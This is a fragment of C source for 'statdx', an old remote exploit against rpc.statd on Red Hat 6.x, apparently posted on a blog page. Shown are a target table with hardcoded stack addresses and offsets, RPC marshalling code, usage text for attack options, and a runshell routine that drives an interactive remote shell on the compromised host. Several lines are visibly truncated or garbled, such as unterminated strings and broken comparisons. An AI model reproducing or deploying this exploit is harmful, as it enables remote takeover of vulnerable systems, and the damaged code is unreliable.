enum res
{
stat_succ,
stat_fail
};
struct sm_name
{
char *mon_name;
};
struct sm_stat_res
{
enum res res_stat;
int state;
};
struct type
{
int type;
char *desc;
char *code;
u_long bufpos;
int buflen;
int offset;
int wipe;
};
struct type types[] =
{
{0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600,
9},
{1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
{2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9},
{0, NULL, NULL, 0, 0, 0, 0}
};
bool_t
xdr_sm_name(XDR *xdrs, struct sm_name *objp)
{
if (!xdr_string(xdrs, &objp->mon_name, SM_MAXSTRLEN))
return (FALSE);
return (TRUE);
}
bool_t
xdr_res(XDR *xdrs, enum res *objp)
{
if (!xdr_enum(xdrs, (enum_t *)objp))
return (FALSE);
return (TRUE);
}
bool_t
xdr_sm_stat_res(XDR *xdrs, struct sm_stat_res *objp)
{
if (!xdr_res(xdrs, &objp->res_stat))
return (FALSE);
if (!xdr_int(xdrs, &objp->state))
return (FALSE);
return (TRUE);
}
void
usage(char *app)
{
int i;
fprintf(stderr, "statdx by ron1n
fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app);
fprintf(stderr, "\t[-o offset] [-w num] [-s secs] [-d type]
fprintf(stderr, "-t\tattack a tcp dispatcher [udp]\n");
fprintf(stderr, "-p\trpc.statd serves requests on
fprintf(stderr, "-a\tthe stack address of the buffer is
fprintf(stderr, "-l\tthe length of the buffer is
fprintf(stderr, "-o\tthe offset to return to is
fprintf(stderr, "-w\tthe number of dwords to wipe is
fprintf(stderr, "-s\tset timeout in seconds to
fprintf(stderr, "-d\tuse a hardcoded
fprintf(stderr, "Available types:\n");
for(i = 0; types[i].desc; i++)
fprintf(stderr, "%d\t%s\n", types[i].type, types[i].desc);
exit(EXIT_FAILURE);
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "cd /; ls -alF; id;\n", 19, 0);
for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) <>
{
perror("select()");
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) <>
{
perror("recv()");
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
errno = 0;
if(send(sockd, buff, ret, 0) != ret)
{
if(errno) perror("send()");
else fprintf(stderr, "Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}
0 comments
Post a Comment